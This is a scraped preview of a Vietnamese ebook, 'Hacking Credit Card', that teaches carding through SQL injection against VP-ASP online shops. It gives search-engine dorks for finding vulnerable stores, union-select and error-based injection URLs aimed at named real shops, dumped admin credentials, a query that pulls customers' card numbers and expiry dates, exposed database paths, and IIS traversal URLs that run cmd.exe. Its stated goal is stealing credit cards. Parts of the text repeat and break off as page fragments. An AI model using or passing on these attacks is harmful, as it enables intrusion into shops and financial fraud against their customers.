Hacking Credit Card

66 1.7K 8
Hacking Credit Card

Đang tải... (xem toàn văn)

Tài liệu hạn chế xem trước, để xem đầy đủ mời bạn chọn Tải xuống

Thông tin tài liệu

Hacking Credit Card

Ebook này được viết ra nhằm mục đích làhọc hỏi và chia sẽ kiến thức.Email: hieuitpc@yahoo.comHomepage: http://cntt.pro.vnNội dung của ebook: hai tutorials do hieupc viết và một vài tutorials khác doanh em bằng hữu viết, trong đó có một vài tutorials cũ nhưng cũng rất đángđược đưa vào với mục đích để tham khảo. Hacking Credit Card Version 2.0 --- Written by Hieupcshopdisplayproducts.asp?cat='Sau một thời gian dài TTD bị chia cắt đến nay, hieupc mới bắt đầu viết 1 tutorial về hack credit card mới và có lẽ đâylà tutorial cuối cùng đầy đủ nhất,được hieupc biên soạn và sưu tầm từ nhiều tutorial cũ đến mới vào 1 cái ebook và trảlời những câu hỏi thắc mắc của các bạn và hieupc cũng ðã làm 1 bản Ebook hacking credit card.Nào giờ chúng ta bắt ðầu bắt ðầu nhé.Cách này cũng nhý những cách thông thường là khai thác theo lỗi SQL và cũng có thể áp dụng cho 1 số lỗi khác như:OLE DB, JET Database, ASP…Býớc 1:Khuyến cáo nên search shop ở www.google.com hoặc www.search.com vì mình thấy 2 site này rất very good.Từ khoá nên dùng:allinurl:”shopdisplayproducts.asp?id=hoặc allinurl:”shopdisplayproducts.asp?cat=1 hoặc allinurl:”shopdisplayproducts.asp?cat=2……Search shop theo Domain .com, .net , .biz… :allinurl:”.com/shopdisplayproducts.asp?cat=,allinurl:”.net/shopdisplayproducts.asp?cat= .Ai biết chấm gì nữa thì thay vào :)Khả năng lấy được credit card: là 99.9 % còn 0.1 % còn lại phụ thuộc vào cái đầu của bạn.Xong phần search, bạn thu hoặch lại tất cả các shop bị lỗi và bắt ðầu hack.Býớc 2:Ví dụ: lấy ví dụ là 1 site thế có dạng thế này : http://www.victim.comhttp://www.victim.com/shopdisplayproducts.asp?id=5Ta sẽ thêm dấu phẩy ( ` ) vào sau số 5:http://www.victim.com/shopdisplayproducts.asp?id=5'Xem nó có bị lỗi không nào, hic nó không bị lỗi, chỉ thấy thế này:Home ImprovementPage 1 of 2 Không sao, chúng ta hãy bình tĩnh nhé, thay “ id “ bằng “ cat “ thử xem:http://www.victim.com/shopdisplayproducts.asp?id=5'-->>> http://www.victim.com/shopdisplayproducts.asp?cat=5'Uh, nó lỗi ruì kìa:5'Microsoft JET Database Engine error '80040e14'Syntax error in query expression 'cc.intcatalogid=p.catalogid and cc.intcategoryid=c.categoryid and c.catdescription like '5'%' and hide=0 order by specialoffer desc,cname'./shop$db.asp, line 467Okie, tiếp tục nhé, bạn sẽ thêm ðoạn code sau ðây vào:'%20union%20%20select%201%20from%20tbluser"having%201=1--sp_passwordhttp://www.victim.com/shopdisplayproducts.asp?id=5'Khi thêm xong thì sẽ nhý thế này:http://www.victim.com/shopdisplayproducts.asp?id=5'%20union%20%20select%201%20from%20tbluser"having%201=1--sp_passwordvà ðýợc thế? này :5' union select 1 from tbluser"having 1=1--sp_passwordMicrosoft JET Database Engine error '80040e14'The number of columns in the two selected tables or queries of a union query do not match./shop$db.asp, line 467Chú ý nhé các bạn, cái dấu phẩy ( ` ) rất quan trọng, không có là không được.Và cứ thế ta cứ tiếp tục thêm số nhé:http://www.victim.com/shopdisplayproducts.asp?id=5'%20union%20%20select%201,2%20from%20tbluser"having%201=1--sp_password http://www.victim.com/shopdisplayproducts.asp?id=5'%20union%20%20select%201,2,3%20from%20tbluser"having%201=1--sp_passwordhttp://www.victim.com/shopdisplayproducts.asp?id=5'%20union%20%20select%201,2,3,4%20from%20tbluser"having%201=1--sp_passwordCứ thế mà tiếp tục cho ðến khi bạn thấy 1 cái bảng đẹp đẹp hiện ra với vài con số.Ở ðây là tới số 47 :http://www.victim.com/shopdisplayproducts.asp?cat='%20union%20%20select%201,2,3,fldusername,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,fldpassword,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47%20from%20tbluser"having%201=1--sp_password3click to see more 42218Please review these other products:Nào giờ chúng ta bắt đầu lấy user and pass:·fldusername : thay cho số 3 , hay 4, hay 22 tuỳ bạn·fldpassword : thay cho số 3 , hay 4, hay 22 tuỳ bạnSau khi thêm xong ta sẽ được nhý thế này:http://www.victim.com/shopdisplayproducts.asp?cat='%20union%20%20select%201,2,3,fldusername,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,fldpassword,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47%20from%20tbluser"having%201=1--sp_passwordVà có được username và password :User: stephenrossipass: gnilsurHoặc bạn có thể gộp chung fldusername và fldpassword vào 1 số cũng được.http://www.victim.com/shopdisplayproducts.asp?cat='%20union%20%20select%201,2,3,fldusername%2b'/'%2bfldpassword,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47%20from%20tbluser"having%201=1--sp_passwordTa sẽ có user và pass được gộp chung 1 số:stephenrossi/gnilsur Bước 3:Tìm link admin, thử đánh cái này vào được không nào: http://www.victim.com/shopadmin.asp hic không được rồi.Thử cái này nữa thử xem, may ra nó chạy đến link admin thì sao: http://www.victim.com/shopadmin1.asp , cũngkhông được.Cái này hieupc đã download cái source của VPASP về xem cấu trúc nó thế nào, và đã tìm ra cậu lệnh thế này, chẳngqua là thay table thôi.Ta biết table configuration là nơi chứa những thông quan trọng của shop như là link admin, afftemplateaffiliate,afftemplateMerchant… Vậy cậu lệnh sẽ thế này:'%20union%20%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47%20from%20configuration"having%201=1--sp_passwordThay vào ta sẽ được:http://www.valuevision.com.ph/shopdisplayproducts.asp?cat='%20union%20%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47%20from%20configuration"having%201=1--sp_passwordTa cũng thấy cái bảng:3click to see more 42218Please review these other products:Lần này thì ta sẽ kiếm link admin, thường thì link admin nằm trong fieldvalue , vì thế ta sẽ đặt fieldvalue vào số 3,hay 4, hay 22 tuỳ các bạn.'%20union%20%20select%201,2,3,fieldvalue,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47%20from%20configuration"having%201=1--sp_passwordSau khi thêm xong ta sẽ được thế này:http://www.victim.com/shopdisplayproducts.asp?cat='%20union%20%20select%201,2,3,fieldvalue,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47%20from%20configuration"having%201=1--sp_password Các bạn sẽ chẳng thấy link admin ở đâu hết toàn là mấy con số, lúc đầu hieupc cũng tưởng là mình làm sai cậu lệnh,nhưng loay hoay 1 đỗi , kéo trang lên, kéo trang xuống, à thì ra có tới 10 trang.Page 1 of 10Chỉ cần để ý là các bạn thấy thôi, nói thêm là: mỗi một trang như vậy là chứa những thông tin có trong fieldvalue ,các bạn cứ cố gắng view từng trang nhé, hieupc view hết 10 trang và thu thập được những link có đuôi là *.asp:shopaddmoretocart.aspshopcheckout.aspshopdisplaycategories.aspNhất định 1 trong 3 link này là link admin login , hieupc đã thử hết 3 link và cái link đầu tiên là link adminshopaddmoretocart.asphttp://www.victim.com/shopaddmoretocart.aspThis site is reserved for Shop Administrators only.Administrator's LoginUserName :Password :Bây giờ lấy username và password ở trên để thay vào. Việc còn lại chắc các bạn biết.THE ENDImage Field Hacking Credit Card Version 1.0 --- Written by HieupcHack Shop VPASP thật sự là như thế nào?( Cập nhật và được phát triển thêm từ nhiều bài viết hướng dẫn trước đây )CÁCH THỨ 1: Cái này chắc có lẽ cũng có nhiều bạn biết, nếu mình đoán không lầm thě chỉ có 30 %-50 % member làbiết cách này, tuy nhiên mình cũng đưa lên đây cho các bạn chýa biết và các bạn đă biết rùi học hỏi thêm ở mình hoặcgóp ý thêm cho mình chỗ nào chưa hoàn chỉnh !Cách này cũng như những cách thông thường là khai thác theo l ỗi SQL và cũng có thể áp dụng cho 1 số lỗi khác nhưOLE DB, JET Database, ASP…Bước 1: Ðể tìm site bị lỗi kiểu này đòi hỏi bạn phải có nhiều kinh nghiệm tìm lỗi và search shop như thế nào cho thậtlà hiệu quả. Bước này cũng là bước quan trọng nhất vì không có shop lỗi làm sao hack :))Khuyến cáo nên search shop ở www.google.com hoặc www.search.com vì mình thấy 2 site này rất very good.Từ khoá nên dùng:allinurl:”shopdisplayproducts.asp?id=hoặc allinurl:”shopdisplayproducts.asp?id=1 hoặc allinurl:”shopdisplayproducts.asp?id=2……Search shop theo Domain .com, .net , .biz… :allinurl:”.com/shopdisplayproducts.asp?id= ; allinurl:”.net/shopdisplayproducts.asp?id= .Ai biết chấm gì nữa thì thay vào :)Xong phần search, bạn thu hoặch lại tất cả các shop bị lỗi và bắt ðầu hack.Bây giờ mình lấy ví dụ shop này nhé:http://www.carstereoinwales.co.uk/chris/shopdisplayproducts.asp?id=1Oh, 1 em Uk cực ngon không biết có CC.Bây giờ kiểm tra xem nó lỗi không bằng cách thêm vào dấu phẩy ( ` )http://www.carstereoinwales.co.uk/chris/shopdisplayproducts.asp?id=1'Oh site bị lỗi kìa các bạn :ProductsMicrosoft OLE DB Provider for ODBC Drivers error '80040e14'[Microsoft][ODBC Microsoft Access Driver] Syntax error in string in query expression 'ccategory = 1' Order By specialOffer DESC,cname'./chris/shop$db.asp, line 868Bý?c 2:Ta bắt đầu thêm vào đoạn code này :%20union%20%20select%201%20from%20tbluser%27Vào phía sau link shop nhớ bỏ luôn cái dấu phẩy sau ?id=1 nhé, nếu không là không được đâu đấy. Khi thêm xong link sẽ như thế này:http://www.carstereoinwales.co.uk/chris/shopdisplayproducts.asp?id=1%20union%20%20select%201%20from%20tbluser%27Oh không dụ gì đây :)ProductsMicrosoft OLE DB Provider for ODBC Drivers error '80004005'[Microsoft][ODBC Microsoft Access Driver] The number of columns in the two selected tables or queries of a union query do notmatch./chris/shop$db.asp, line 868Còn không biết qua bước 3 nữa, nhưng khoan các bạn hãy xem kinh nghiệm của mình đă khi thêm vào dấu phẩy ( ` )mà nó hiện ra lỗi như vầy:Microsoft OLE DB Provider for SQL Server error '80040e14'Unclosed quotation mark before the character string ' './product.asp, line 29Thì các bạn hack theo kiểu hack cũ nhé.Thui bây giờ qua bước 3 nhé, nói nhiều quá :))Sau khi đă hoàn thành bước 2, bạn sẽ bắt đầu 1 công việc thiêng liêng nhất và cũng là mệt mỏi nhất, không mệt đâuchỉ uể oải 1 tí, đó là thêm số vào code:1%20union%20%20select%201,2%20from%20tbluser%271%20union%20%20select%201,2,3%20from%20tbluser%271%20union%20%20select%201,2,3,4%20from%20tbluser%27……… Khi thêm vào thì link sẽ như thế này :http://www.carstereoinwales.co.uk/chris/shopdisplayproducts.asp?id=1%20union%20%20select%201,2%20from%20tbluser%27http://www.carstereoinwales.co.uk/chris/shopdisplayproducts.asp?id=1%20union%20%20select%201,2,3%20from%20tbluser%27 http://www.carstereoinwales.co.uk/chris/shopdisplayproducts.asp?id=1%20union%20%20select%201,2,3,4%20from%20tbluser%27 ………… Cứ thêm số tiếp tục nhé, đừng nản lòng hãy cố lên.Cho đến khi nó xuất hiện 1 cái bảng rất đẹp :))Ái da, mỏi tay quá tới số 34 mới hiện ra cái bảng trời đánh này :))http://www.carstereoinwales.co.uk/chris/shopdisplayproducts.asp?id=1%20union%20%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34%20from%20tbluser%27Đây là bước cuối cùng để lấy user and pass: những con số quan trọng của shop naỳ là : 3, 4 , 22.fldusername <~ thay vào số 4fldpassword <~ thay vào số 22Sau khi thay xong link sẽ như thế này:http://www.carstereoinwales.co.uk/chris/shopdisplayproducts.asp?id=1%20union%20%20select%201,2,3,fldusername,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,fldpassword,23,24,25,26,27,28,29,30,31,32,33,34%20from%20tbluser%27Và các bạn đã có user and pass rùi đấy:User: admin848pass: admin848User: carstepass: carstePhần còn lại là tìm link admin để login, cái này cũng khá quan trọng vì không có link admin làm sao lấy CC :))Chú ý: link admin để login mặc định của VPASP là : shopadmin.asp cũng có khi ta đánh shopadmin1.asp sẽ vào linkadmin.CÁCH HACK THỨ 2 RÚT RA TỪ BÀI HƯỚNG DẪN CỦA ANH HAI Silveryhat_Hacker :Bước 1 tương tự như trên: Ví dụ site này:http://www.nelcoproducts.com/shopping/shopdisplayproducts.asp?id=153'cũng thêm vào dấu phẩy ( ` ) để check lỗiProductsMicrosoft OLE DB Provider for ODBC Drivers error '80040e14'[Microsoft][ODBC SQL Server Driver][SQL Server]Unclosed quotation mark before the character string ''./shopping/shopdisplayproducts.asp, line 93Oh có lỗi rồi, giờ sao đây :))Cái này anh em biết khai thác chứ:http://www.nelcoproducts.com/shopping/shopdisplayproducts.asp?id=153%20and%201=convert(int,(select%20top%201%20table_name%20from%20information_schema.tables))--sp_passwordMicrosoft OLE DB Provider for ODBC Drivers error '80040e07'[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'ver_Faq' to a column of data typeint./shopping/shopdisplayproducts.asp, line 93Bước 2 chắc các bạn biết, chỉ là lấy table thui, mình chỉ việc kiếm table nào chưá users của admin là okie.http://www.nelcoproducts.com/shopping/shopdisplayproducts.asp?id=153%20and%201=convert(int,(select%20top%201%20table_name%20from%20information_schema.tables%20where%20table_name%20not%20in%20('ver_Faq','coupons','customerprices','customers')))--sp_passwordProductsMicrosoft OLE DB Provider for ODBC Drivers error '80040e07'[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'AdminUsers' to a column of datatype int./shopping/shopdisplayproducts.asp, line 93Tới đây là đã quá rõ, cái mình chính là table này : 'AdminUsers' vì sao vậy vì nó chưá user và pass chắc. Thui cứ khaithác thử.Code: %20and%201=convert(int,(select%20top%201%20column_name%20from%20information_schema.columns%20where%20table_name=('AdminUsers')))--sp_passwordKhi thêm code xong sẽ như thế này:http://www.nelcoproducts.com/shopping/shopdisplayproducts.asp?id=153%20and%201=convert(int,(select%20top%201%20column_name%20from%20information_schema.columns%20where%20table_name=('AdminUsers')))--sp_passwordProductsMicrosoft OLE DB Provider for ODBC Drivers error '80040e07'[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'AdminID' to a column of data typeint./shopping/shopdisplayproducts.asp, line 93 [...]... : http://www.carstereoinwales.co.uk/chris/shopdisplayproducts.asp?id=1%20union%20%20select%201,2%20from% 20tbluser%27 http://www.carstereoinwales.co.uk/chris/shopdisplayproducts.asp?id=1%20union%20%20select%201,2,3%20from% 20tbluser%27 Hacking Credit Card Version 2.0 Written by Hieupc shopdisplayproducts.asp? cat=' Sau một thời gian dài TTD bị chia cắt đến nay, hieupc mới bắt đầu viết 1 tutorial về hack credit card mới và có lẽ đây là tutorial cuối cùng đầy đủ nhất,được hieupc biên soạn và sưu tầm từ nhiều tutorial cũ đến mới vào 1 cái ebook và trả lời những câu hỏi thắc mắc của các bạn và hieupc cũng ðã làm 1 bản Ebook hacking. .. 1% 20firstname%2b'/'%2blastname%2b'/'%2bemail%2b'/'%2borgName%2b'/'%2baddress%2b'/'%2bcredit _card% 2b'/'% 2bcard_number%2b'/'%2bExpDate_month%2b'/'%2bExpDate_year%2b'/'%2bnameOnCard%2b'/'%2bcity%2b'/'% 2bstate%2b'/'%2bzip%20from%20ec_orders)) sp_password Tương tự bạn có thể làm với... allinurl:”shopdisplayproducts.asp?cat=2…… Search shop theo Domain .com, .net , .biz… : allinurl:”.com/shopdisplayproducts.asp?cat=,allinurl:”.net/shopdisplayproducts.asp?cat= Ai biết chấm gì nữa thì thay vào :) Khả năng lấy được credit card: là 99.9 % còn 0.1 % còn lại phụ thuộc vào cái đầu của bạn. Xong phần search, bạn thu hoặch lại tất cả các shop bị lỗi và bắt ðầu hack. Býớc 2: Ví dụ: lấy ví dụ là 1 site thế có dạng thế này :... tutorial cuối cùng đầy đủ nhất,được hieupc biên soạn và sưu tầm từ nhiều tutorial cũ đến mới vào 1 cái ebook và trả lời những câu hỏi thắc mắc của các bạn và hieupc cũng ðã làm 1 bản Ebook hacking credit card. Nào giờ chúng ta bắt ðầu bắt ðầu nhé. Cách này cũng nhý những cách thông thường là khai thác theo lỗi SQL và cũng có thể áp dụng cho 1 số lỗi khác như: OLE DB, JET Database, ASP… Býớc 1: Khuyến... lỗi hay trên một site khác, customer đăng nhập mua hàng có dùng password khơng tất cả những thông tin liên quan đến việc mua bán để xác định có nên hack site này khơng. - Nên khai thác đầu tiên là creditcard_number , nếu khơng có, có khả năng site đã fix dữ liệu hoặc dùng một site khác để thanh toán. - Khi lấy được user/pass của admin cần dùng nó để đăng nhập server với giao thức ftp, ví dụ:ftp://ppmsddev.ctsg.com/, nếu... hóa hay cất giữ cẩn thận nên bạn hồn tồn có thể lấy chúng một cách dễ dàng Lưu ý: đôi khi với thực tế, 1 số link có thể khác đi, khơng phải lúc nào cũng hồn tồn đúng, dữ liệu có khi bao gồm cả CRD (Credit Card) nên mọi việc phải qua proxy (nếu khơng có proxy thì có thể ra dịch vụ ) Khai thác: Hãy sử dụng 1 trong những link sau: www.victim.com/fpdb/shop.mdb www.victim.com/shoponline/fpdb/shop.mdb www.victim.com/database/metacart.mdb www.victim.com/shopping/database/metacart.mdb www.victim.com/shop/database/metacart.mdb www.victim.com/metacart/database/metacart.mdb www.victim.com/mcartfree/database/metacart.mdb www.victim.com/ASP/cart/database/metacart.mdb Ví... download cc từ đây:www.84vn.com/database/metacart.mdb Có nghĩa là database khơng hề có 1 chút bảo mật nào cả. Download vơ tư ! Trong database có thể bao gồm: name, surname, address, e-mail, phone number, credit card number, company name Bạn có thể khai thác dữ liệu này, nhưng trong thực tế, mọi việc không phải lúc nào cũng sn sẻ cả, bạn hãy tưởng tượng mỗi server có một cấu trúc riêng, ví dụ như đường dẫn... Bạn sẽ nhận được 1 số thông tin Được gì ? Chưa được gì hết Tên và mật khẩu : Khơng cần Sau đó ? Giả sử bạn kiếm được trang web sau có lỗi http://www.connectionsmall.com/scripts/cart32.exe/ Bạn thay từ card3 2.exe bằng những dịng sau đây : I) %e0%80%af / %e0%80%af / %e0%80%af /winnt/system32/cmd.exe?/c+dir+c:\ II) %c0%af %c0%af %c0%af %c0%af /winnt/system32/cmd.exe?/c+dir+c:\ III) %c1%9c /winnt/system32/cmd.exe?/c+dir+c:\ Ví . tutorials cũ nhưng cũng rất đángđược đưa vào với mục đích để tham khảo. Hacking Credit Card Version 2.0 --- Written by Hieupcshopdisplayproducts.asp?cat='Sau. những câu hỏi thắc mắc của các bạn và hieupc cũng ðã làm 1 bản Ebook hacking credit card. Nào giờ chúng ta bắt ðầu bắt ðầu nhé.Cách này cũng nhý những cách

Ngày đăng: 16/08/2012, 14:40

Từ khóa liên quan

Tài liệu cùng người dùng

  • Đang cập nhật ...

Tài liệu liên quan